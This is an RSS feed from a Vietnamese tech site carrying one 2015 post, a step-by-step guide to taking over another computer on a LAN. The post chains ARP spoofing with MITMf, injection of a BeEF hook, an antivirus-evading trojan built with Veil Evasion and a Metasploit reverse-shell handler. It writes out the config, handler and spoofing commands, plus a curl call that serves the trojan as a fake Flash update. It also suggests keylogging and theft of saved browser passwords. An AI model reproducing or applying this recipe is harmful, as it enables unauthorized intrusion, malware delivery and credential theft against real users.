<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>Veil Evasion &#8211; AnonyViet</title>
	<atom:link href="https://anonyviet.com/tag/veil-evasion/feed/" rel="self" type="application/rss+xml" />
	<link>https://anonyviet.com</link>
	<description>Webiste chia sẻ kiến thức công nghệ thông tin, mạng máy tính, bảo mật phổ biến nhất Việt Nam. Luôn cập nhật tin tức, thủ thuật nóng hổi nhất</description>
	<lastBuildDate>Wed, 16 Dec 2020 00:41:16 +0000</lastBuildDate>
	<language>vi</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://anonyviet.com/wp-content/uploads/2018/10/cropped-ico-logo-75x75.png</url>
	<title>Veil Evasion &#8211; AnonyViet</title>
	<link>https://anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit</title>
		<link>https://anonyviet.com/dot-nhap-vao-mot-may-tinh-bat-ky-trong-mang-lan-voi-beef-mitmf-veil-evasion-metasploit/</link>
					<comments>https://anonyviet.com/dot-nhap-vao-mot-may-tinh-bat-ky-trong-mang-lan-voi-beef-mitmf-veil-evasion-metasploit/#comments</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Thu, 10 Dec 2015 10:53:10 +0000</pubDate>
				<category><![CDATA[Kali Linux / Parrot]]></category>
		<category><![CDATA[Beef]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[Mitmf]]></category>
		<category><![CDATA[Veil Evasion]]></category>
		<guid isPermaLink="false">http://anonyviet.com/?p=436</guid>

					<description><![CDATA[Ý tưởng: Beef + Mitmf + Veil Evasion + Metasploit. Beef: Sử dụng để upload file chứa trojan mà Veil Evasion tạo ra đến máy tính nạn nhân qua trình duyệt web Mitmf có nhiệm vụ tiêm hook.js đến một website bất kỳ khi nạn nhân mở bất kỳ một website nào mới. Mitmf còn [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><span style="font-family: arial; color: #008000;">Ý tưởng: Beef + Mitmf + Veil Evasion + Metasploit.</span><br />
<span style="font-family: arial; color: #008000;"><br />
</span><br />
<span style="font-family: arial; color: #008000;"> Beef: Sử dụng để upload file chứa trojan mà Veil Evasion tạo ra đến máy tính nạn nhân qua trình duyệt web</span><br />
<span style="font-family: arial; color: #008000;"><br />
</span><br />
<span style="font-family: arial; color: #008000;"> Mitmf có nhiệm vụ tiêm hook.js đến một website bất kỳ khi nạn nhân mở bất kỳ một website nào mới.</span><br />
<span style="font-family: arial; color: #008000;"><br />
</span><br />
<span style="font-family: arial; color: #008000;"> Mitmf còn có thể tiêm một file trojan bất kỳ vào máy tính nạn nhân khi nạn nhân download một file .zip về máy mà không hề hay biêt file .zip đấy đã bị nhiễm trojan.</span></p>
<p><span style="color: #008000;">Mitmf còn có thể gi lại thao tác bàn phím trên máy tính nạn nhân khi truy cập trình duyệt web qua jskeylogger</span><br />
<span style="font-family: arial; color: #008000;"><br />
</span><br />
<span style="font-family: arial; color: #008000;"> Veil Evasion: tạo một trojan vượt qua tất cả các phần mềm diệt virus mà không bị phát hiện chạy ngầm trong máy tính của nạn nhân. tạo trojan với IP và PORT của máy tính hacker. </span><br />
<span style="font-family: arial; color: #008000;"><br />
</span><br />
<span style="font-family: arial; color: #008000;"> Metasploit. Luôn luông lắng nghe ở IP và PORT của hacker khi nạn nhân mở file có chứa trojan thì hacker sẽ đột nhập vào máy tính nạn nhân và toàn quyền kiểm soát. Bằng việc sử dụng các command trong Metasploit. Loạt bài sau tôi sẽ hướng dẫn các bạn sử dụng <i>Metasploit Untimate</i>. Để tăng tinh vui nhộn và đặc sắc thì có thể kết hợp thêm Lazagne để lấy thông tin user and password mà nạn nhân đã lưu trên trình duyệt web. ===&gt; tự tuy duy thêm </span></p>
<p><span style="color: #008000;"><span id="more-436"></span><br />
Chuần bị:</span></p>
<p><span style="color: #008000;"><i><a style="color: #008000;" href="https://github.com/byt3bl33d3r/MITMf" target="_blank" rel="noopener">https://github.com/byt3bl33d3r/MITMf</a></i></span><br />
<span style="color: #008000;"> <i><a style="color: #008000;" href="https://github.com/Veil-Framework/Veil-Evasion" target="_blank" rel="noopener">https://github.com/Veil-Framework/Veil-Evasion</a></i></span></p>
<p><span style="color: #008000;"><i><a style="color: #008000;" href="http://beefproject.com/" target="_blank" rel="noopener">http://beefproject.com/</a></i></span></p>
<p><span style="color: #008000;">OS: Kali Linux.</span></p>
<p><span style="color: #008000;">Thực hiện:</span></p>
<p><span style="color: #008000;"><i>1. Config Beef.<br />
</i></span><br />
<span style="color: #008000;"> <i>cd </i><i>/usr/share/beef-xss/extensions/metasploit.</i></span></p>
<p><span style="color: #008000;"><i>vi config.yaml<br />
</i><br />
host: &#8220;192.168.1.12&#8221;</span></p>
<p><span style="color: #008000;">callback_host: &#8220;192.168.1.12&#8221;</span></p>
<p><span style="color: #008000;">{os: &#8216;custom&#8217;, path: &#8216;/usr/share/metasploit-framework/&#8217;}</span></p>
<p><span style="color: #008000;"><i>cd /usr/share/beef-xss</i></span></p>
<p><span style="color: #008000;"><i>vi config.yaml</i></span></p>
<p><span style="color: #008000;">metasploit:</span><br />
<span style="color: #008000;"> enable: true</span></p>
<p><span style="color: #008000;"><a id="attachment29300" class="bbcode-attachment js-slideshow__gallery-node" style="color: #008000;" href="https://forum.whitehat.vn/filedata/fetch?id=29300&amp;d=1435679502" rel="Lightbox_0 noopener"><br />
</a><a id="attachment29301" class="bbcode-attachment js-slideshow__gallery-node" style="color: #008000;" href="https://forum.whitehat.vn/filedata/fetch?id=29301&amp;d=1435679510" rel="Lightbox_0 noopener"></a><i>Chạy Beef ./beef<br />
</i></span><br />
<span style="color: #008000;"> Vào trình duyệt gõ địa chỉ sau <i>UI URL: <a style="color: #008000;" href="http://192.168.1.12:3000/ui/panel" target="_blank" rel="noopener">http://192.168.1.12:3000/ui/panel</a> user and pass default: beef and beef</i></span></p>
<p><span style="color: #008000;"><a id="attachment29302" class="bbcode-attachment js-slideshow__gallery-node" style="color: #008000;" href="https://forum.whitehat.vn/filedata/fetch?id=29302&amp;d=1435680275" rel="Lightbox_0 noopener"></a><i>Chạy Veil Evasion.</i></span></p>
<p><span style="color: #008000;">./Veil-Evasion.py</span><br />
<span style="color: #008000;"> <a id="attachment29304" class="bbcode-attachment js-slideshow__gallery-node" style="color: #008000;" href="https://forum.whitehat.vn/filedata/fetch?id=29304&amp;d=1435680929" rel="Lightbox_0 noopener"><br />
</a><a id="attachment29305" class="bbcode-attachment js-slideshow__gallery-node" style="color: #008000;" href="https://forum.whitehat.vn/filedata/fetch?id=29305&amp;d=1435680937" rel="Lightbox_0 noopener"><br />
</a><i>Chạy Metasploit.<br />
</i></span></p>
<p><span style="color: #008000;">msf &gt; use multi/handler</span></p>
<p><span style="color: #008000;">msf exploit(handler) &gt; set PAYLOAD windows/meterpreter/reverse_tcp</span><br />
<span style="color: #008000;"> PAYLOAD =&gt; windows/meterpreter/reverse_tcp</span><br />
<span style="color: #008000;"> msf exploit(handler) &gt; set LHOST 192.168.1.12</span><br />
<span style="color: #008000;"> LHOST =&gt; 192.168.1.12</span><br />
<span style="color: #008000;"> msf exploit(handler) &gt; set LPORT 4444</span><br />
<span style="color: #008000;"> LPORT =&gt; 4444</span><br />
<span style="color: #008000;"> msf exploit(handler) &gt; exploit[*] Started reverse handler on 192.168.1.12:4444 [*] Starting the payload handler&#8230;</span></p>
<p><span style="color: #008000;"><i>Chạy Mitmf.</i></span></p>
<p><span style="color: #008000;"><a id="attachment29310" class="bbcode-attachment js-slideshow__gallery-node" style="color: #008000;" href="https://forum.whitehat.vn/filedata/fetch?id=29310&amp;d=1435681793" rel="Lightbox_0 noopener"></a>mitmf &#8211;spoof &#8211;arp -i eth0 &#8211;gateway 192.168.1.1 &#8211;target 192.168.1.18 &#8211;inject &#8211;js-url <a style="color: #008000;" href="http://192.168.1.12:3000/hook.js" target="_blank" rel="noopener">http://192.168.1.12:3000/hook.js</a></span></p>
<p><span style="color: #008000;"><i>Để tăng cuộc chơi thêm vui vẻ và thú vị hơn tôi đã tìm kiến trên internet một bài nhạc mang phong cách đặc trưng của hacker và sẽ phát trên máy tính nạn nhân thông qua Beef. khi tôi thực hiện điều này máy tính của nạn nhất sẽ tự động phát nhạc mà không có bất kì dấu hiệu nào.</i></span></p>
<p><span style="color: #008000;">copy bài nhạc vào đây.</span></p>
<p><span style="color: #008000;">/usr/share/beef-xss/extensions/demos/html</span></p>
<p><span style="color: #008000;">copy trojan tạo ra vào đây.</span></p>
<p><span style="color: #008000;">/usr/share/beef-xss/extensions/social_engineering/droppers</span></p>
<p><span style="color: #008000;">/usr/share/beef-xss/modules/exploits/local_host/firefox_extension_dropper/dropper</span></p>
<p><span style="color: #008000;"><a id="attachment29312" class="bbcode-attachment js-slideshow__gallery-node" style="color: #008000;" href="https://forum.whitehat.vn/filedata/fetch?id=29312&amp;d=1435682509" rel="Lightbox_0 noopener"></a><i>Ý tương tiếp theo tôi sẽ đầy trojan lên máy tính nạn nhân qua Beef bằng tính năng Fake Flash Updae trong Social Engineering.</i></span></p>
<p><span style="color: #008000;">Đề làm được việc này bạn cần chạy đoạn mã sau:</span></p>
<p><span style="color: #008000;"> curl -H &#8220;Content-Type: application/json; charset=UTF-8&#8221; -d'{&#8220;mount&#8221;:&#8221;/flashplayer.exe&#8221;, &#8220;local_file&#8221;:&#8221;/extensions/social_engineering/droppers/flashplayer.exe&#8221;}&#8217; -X POST 192.168.1.12.132/api/server/bind?token=4e0f77f2f2ef98f7fd3cd18aebbf96d75ef051c c</span></p>
<p><span style="color: #008000;"><i>==&gt; tôi không giải thích ở đây các bạn phải tự ngiên cứu thêm.</i></span></p>
<p><span style="color: #008000;">Mở nhạc hacker trên máy tính nạn nhân cho nạn nhân thư giãn tí <img decoding="async" class="inlineimg" title="Roll Eyes (Sarcastic)" src="https://forum.whitehat.vn/core/images/smilies/rolleyes.png" alt="Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit 3" border="0"></span></p>
<p><span style="color: #008000;"><a id="attachment29314" class="bbcode-attachment js-slideshow__gallery-node" style="color: #008000;" href="https://forum.whitehat.vn/filedata/fetch?id=29314&amp;d=1435683390" rel="Lightbox_0 noopener"><br />
</a><a id="attachment29315" class="bbcode-attachment js-slideshow__gallery-node" style="color: #008000;" href="https://forum.whitehat.vn/filedata/fetch?id=29315&amp;d=1435683401" rel="Lightbox_0 noopener"></a><i>Kết thúc chúng ta đột nhập thành công vào máy tính nạn nhân và còn mở nhạc cho nạn nhân nghe. còn rất nhiều kỹ thuật nữa trong bài này tôi không public vì tính chất nguy hiểm của nó. mọi người tự nghiên cứu và tư duy thêm <img decoding="async" class="inlineimg" title="Embarrassment" src="https://forum.whitehat.vn/core/images/smilies/redface.png" alt="Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit 4" border="0"><br />
</i></span><br />
<span style="color: #008000;">(<i>hackersutudent93 và nguồn từ Whitehat.vn</i>)</span></p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/dot-nhap-vao-mot-may-tinh-bat-ky-trong-mang-lan-voi-beef-mitmf-veil-evasion-metasploit/feed/</wfw:commentRss>
			<slash:comments>3</slash:comments>
		
		
			</item>
	</channel>
</rss>
